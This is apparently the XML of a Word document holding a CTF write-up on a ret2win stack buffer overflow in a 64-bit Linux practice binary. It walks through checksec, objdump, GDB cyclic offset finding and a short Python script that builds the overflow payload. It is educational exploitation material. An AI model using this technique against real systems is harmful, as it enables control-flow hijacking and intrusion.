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120" w:before="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="5B8DEF"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve">RET2WIN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AAAACC"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack Buffer Overflow — Technical Notes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88"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Binary Exploitation  |  CTF  |  Offensive Security Research</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3A3A5C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B8DE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5B8DEF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Overview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This challenge demonstrates exploitation of a 64-bit Linux binary via a stack buffer overflow vulnerability, redirecting program execution into a hidden function called win(). This is a foundational technique in binary exploitation and CTF competitions.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5B8DEF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Relevant domains: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Binary Exploitation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Reverse Engineering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Exploit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Capture-the-Flag (CTF) Competitions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Offensive Security Research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Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3A3A5C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B8DE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5B8DEF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal of the Challenge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The binary normally accepts user input, prints it, and exits. However, a hidden win() function exists that is never called during normal execution. The objective is to hijack control flow and force execution of win() — a technique known as ret2win.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3A3A5C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B8DE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5B8DEF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerability Type — Stack Buffer Overflow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The vulnerability exists because the program accepts user input without size validation. A likely vulnerable implementation:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="3A3A5C" w:sz="4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12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char name[48];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gets(name);         // No bounds check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Or alternatively:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="single" w:color="5B8DEF" w:sz="8"/>
          <w:bottom w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:right w:val="single" w:color="3A3A5C" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="2A2A3E" w:val="clear"/>
        <w:spacing w:after="12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scanf("%s", name);  // Also unsafe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Since the program trusts input completely, data exceeding the buffer overwrites adjacent memory — including the saved return address (RIP).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3A3A5C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B8DE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5B8DEF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Concepts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1. Stack Memory Layout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A simplified view of the stack during function execution:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="3A3A5C" w:sz="4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12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|-----------------------------|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|  Return Address  (RIP)      |  ← overwrite this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|-----------------------------|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|  Saved Base Pointer (RBP)   |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|-----------------------------|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|  Buffer (48 bytes)          |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|-----------------------------|</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="single" w:color="5B8DEF" w:sz="8"/>
          <w:bottom w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:right w:val="single" w:color="3A3A5C" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="2A2A3E" w:val="clear"/>
        <w:spacing w:after="12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|  ... more stack frames ...  |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When user input exceeds the buffer, it spills into the saved frame pointer and ultimately the saved return address, giving us control over execution flow.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2. The RIP Register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In x86-64 architecture, the Instruction Pointer Register (RIP) holds the address of the next instruction to execute.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Normal behavior: RET pops a legitimate return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After exploitation: RET jumps to an attacker-controlled address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This is the core of control flow hijacking.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3A3A5C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B8DE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5B8DEF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Binary Protection Enumeration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Using checksec</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:left w:val="single" w:color="5B8DEF" w:sz="8"/>
          <w:bottom w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:right w:val="single" w:color="3A3A5C" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="2A2A3E" w:val="clear"/>
        <w:spacing w:after="120" w:before="12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checksec --file=_vuln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CCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">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A3A5C" w:sz="1"/>
              <w:left w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:bottom w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:right w:val="single" w:color="3A3A5C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2E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8DE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3120"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:left w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:bottom w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:right w:val="single" w:color="3A3A5C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2E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8DE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3A3A5C" w:sz="1"/>
              <w:left w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:bottom w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:right w:val="single" w:color="3A3A5C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2E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8DE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3A3A5C" w:sz="1"/>
              <w:left w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:bottom w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:right w:val="single" w:color="3A3A5C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2A2A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Stack Canary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:left w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:bottom w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:right w:val="single" w:color="3A3A5C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2A2A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Missing / No Canary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:left w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:bottom w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:right w:val="single" w:color="3A3A5C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2A2A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DD"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">RIP overwrite is possible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:left w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:bottom w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:right w:val="single" w:color="3A3A5C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2525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PIE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:left w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:bottom w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:right w:val="single" w:color="3A3A5C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2525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Disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:left w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:bottom w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:right w:val="single" w:color="3A3A5C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2525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DD"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Addresses are fixed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:left w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:bottom w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:right w:val="single" w:color="3A3A5C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2A2A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NX</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:left w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:bottom w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:right w:val="single" w:color="3A3A5C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2A2A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Disabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:left w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:bottom w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:right w:val="single" w:color="3A3A5C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2A2A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DD"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Stack is executable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:left w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:bottom w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:right w:val="single" w:color="3A3A5C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2525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RELRO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:left w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:bottom w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:right w:val="single" w:color="3A3A5C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2525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9DC76"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Partial</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:left w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:bottom w:val="single" w:color="3A3A5C" w:sz="1"/>
              <w:right w:val="single" w:color="3A3A5C" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2525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DD"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Some GOT sections writable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8D9B0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Stack Canary — Missing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Without canaries, there are no integrity checks before function return. Overwriting RIP proceeds unimpeded.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8D9B0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">PIE — Disabled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Without Position Independent Executable, all function addresses remain constant (e.g., 0x401196 never changes), making exploitation significantly easier.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8D9B0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">NX — Disabled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Although shellcode execution would also be possible with NX disabled, we used the ret2win technique instead.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8D9B0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">RELRO — Partial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Partial RELRO leaves some relocation structures writable. Not directly relevant here but important in more advanced exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3A3A5C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B8DE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5B8DEF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Static Analysis with objdump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:left w:val="single" w:color="5B8DEF" w:sz="8"/>
          <w:bottom w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:right w:val="single" w:color="3A3A5C" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="2A2A3E" w:val="clear"/>
        <w:spacing w:after="120" w:before="12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objdump -d _vuln | grep win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This reveals the hidden function and its fixed address:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:left w:val="single" w:color="5B8DEF" w:sz="8"/>
          <w:bottom w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:right w:val="single" w:color="3A3A5C" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="2A2A3E" w:val="clear"/>
        <w:spacing w:after="120" w:before="12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0000000000401196 &lt;win&gt;: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Finding a ret Gadget</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="3A3A5C" w:sz="4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12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objdump -d _vuln | grep -m1 ret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# Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="single" w:color="5B8DEF" w:sz="8"/>
          <w:bottom w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:right w:val="single" w:color="3A3A5C" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="2A2A3E" w:val="clear"/>
        <w:spacing w:after="12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40101a:    c3    ret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The x86-64 calling convention requires 16-byte stack alignment. Without it, win() may crash on libc instructions like movaps. The extra ret gadget corrects stack alignment before entering win().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3A3A5C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B8DE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5B8DEF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Dynamic Analysis with GDB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="3A3A5C" w:sz="4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12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gdb ./_vuln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# Generate a unique cyclic pattern</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="single" w:color="5B8DEF" w:sz="8"/>
          <w:bottom w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:right w:val="single" w:color="3A3A5C" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="2A2A3E" w:val="clear"/>
        <w:spacing w:after="12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cyclic(200)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Cyclic Patterns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Instead of a uniform pattern like AAAA..., a cyclic pattern is used:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:left w:val="single" w:color="5B8DEF" w:sz="8"/>
          <w:bottom w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:right w:val="single" w:color="3A3A5C" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="2A2A3E" w:val="clear"/>
        <w:spacing w:after="120" w:before="12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aaaabaaacaaadaaaeaaafaaagaaahaaai...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Each 4-byte subsequence is unique, allowing us to pinpoint the exact offset that overwrites RIP.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Crash Analysis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After crashing the binary, inspect the stack:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="3A3A5C" w:sz="4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12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x/1xg $rsp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# Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="single" w:color="5B8DEF" w:sz="8"/>
          <w:bottom w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:right w:val="single" w:color="3A3A5C" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="2A2A3E" w:val="clear"/>
        <w:spacing w:after="12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0x616161706161616f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Using cyclic_find() on this value reveals:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:left w:val="single" w:color="5B8DEF" w:sz="8"/>
          <w:bottom w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:right w:val="single" w:color="3A3A5C" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="2A2A3E" w:val="clear"/>
        <w:spacing w:after="120" w:before="12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OFFSET = 56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After exactly 56 bytes of padding, the next 8 bytes overwrite RIP and become fully controllable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3A3A5C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B8DE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5B8DEF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit Construction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Payload Structure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="3A3A5C" w:sz="4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12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[A * 56]           # Padding to reach RIP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[ret gadget]       # 0x40101a — stack alignment</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="single" w:color="5B8DEF" w:sz="8"/>
          <w:bottom w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:right w:val="single" w:color="3A3A5C" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="2A2A3E" w:val="clear"/>
        <w:spacing w:after="12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[win() address]    # 0x401196 — target function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Python Exploit Script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="3A3A5C" w:sz="4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12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from struct import pack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import sys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offset = 56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ret    = 0x40101a   # stack alignment gadget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win    = 0x401196   # hidden win() function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payload  = b'A' * offset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payload += pack('&lt;Q', ret)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payload += pack('&lt;Q', win)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5B8DEF" w:sz="8"/>
          <w:bottom w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:right w:val="single" w:color="3A3A5C" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="2A2A3E" w:val="clear"/>
        <w:spacing w:after="12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sys.stdout.buffer.write(payload)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Execution Flow After Exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="3A3A5C" w:sz="4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12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vuln()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↓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RET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↓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0x40101a  (ret gadget — aligns stack)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="single" w:color="5B8DEF" w:sz="8"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:right w:val="single" w:color="3A3A5C" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="2A2A3E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↓</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="single" w:color="5B8DEF" w:sz="8"/>
          <w:bottom w:val="single" w:color="3A3A5C" w:sz="4"/>
          <w:right w:val="single" w:color="3A3A5C" w:sz="4"/>
        </w:pBdr>
        <w:shd w:fill="2A2A3E" w:val="clear"/>
        <w:spacing w:after="120" w:before="0" w:line="276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0x401196  (win() — hidden function executes)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After win() completes, execution attempts another return on a now-corrupted stack, causing a segmentation fault. This is completely expected and normal — the flag is captured before the crash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3A3A5C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B8DE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5B8DEF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Takeaways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A. Unsafe Memory Functions Are Dangerous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Functions such as gets(), strcpy(), unsafe scanf(), and unchecked memcpy() can lead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Remote Code Execution (RCE)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Privilege escalation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Arbitrary memory corruption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B. Memory Corruption Is Extremely Powerful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A single unchecked input field allowed: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Full control of the RIP register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Bypassing of intended application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Execution of hidden functionality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C. Mitigations Matter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Modern systems use layered defenses to make exploitation harder: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Stack Canaries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ASLR (Address Space Layout Randomization)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PIE (Position Independent Executables)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NX (Non-Executable Stack)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RELRO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Control Flow Integrity (CFI)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D. Exploitation Requires Combined Analysis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This challenge combined three phases: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Static analysis with objdump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Runtime debugging with GDB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Exploit scripting with Python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Real-world vulnerability research follows the same workflow.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3A3A5C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B8DE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5B8DEF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Real-World Relevance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Vulnerability Research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Security researchers use these techniques to identify exploitable flaws, assess severity, and develop proof-of-concept exploits.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Bug Bounty Programs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Many high-severity vulnerabilities involve memory corruption, buffer overflows, use-after-free bugs, or heap corruption. Understanding exploitation helps validate impact and demonstrate exploitability.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Malware Analysis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Advanced malware frequently employs ROP chains, return-oriented programming, and memory corruption techniques. Understanding exploitation helps analysts reverse and understand attacker tooling.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Embedded Systems &amp; IoT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Many embedded devices still use unsafe C code with outdated toolchains and missing mitigations — including routers, cameras, industrial controllers, and automotive firmware.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Secure Software Development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Developers who understand exploitation write safer code, choose safer libraries, avoid dangerous APIs, and enable compiler mitigations by default.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3A3A5C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B8DE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5B8DEF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Progression Path After Ret2Win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This challenge is the first step in a broader exploitation learning path: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ret2libc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ROP (Return-Oriented Programming) chains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GOT overwrites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Heap exploitation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ASLR bypass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Format string exploitation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Sigreturn-Oriented Programming (SROP)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Kernel exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="3A3A5C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B8DE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5B8DEF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Final Summary</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="32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In this challenge, you successfully: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Enumerated binary protections using checksec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Analyzed executable memory structure with objdump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Identified a hidden win() function at a fixed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Calculated a precise RIP overwrite offset using cyclic patterns in GDB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Crafted a controlled exploit payload in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Redirected execution flow via stack alignment gadget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CCCDD"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Triggered hidden program logic and captured the flag</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="5B8DEF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This is a foundational milestone in binary exploitation and offensive security.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00"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="5B8DEF"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w15:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1000" w:hanging="300"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="A78BF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CCD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5B8DE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A78BF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78D9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2026-05-25T14:32:25.871Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-25T14:32:25.871Z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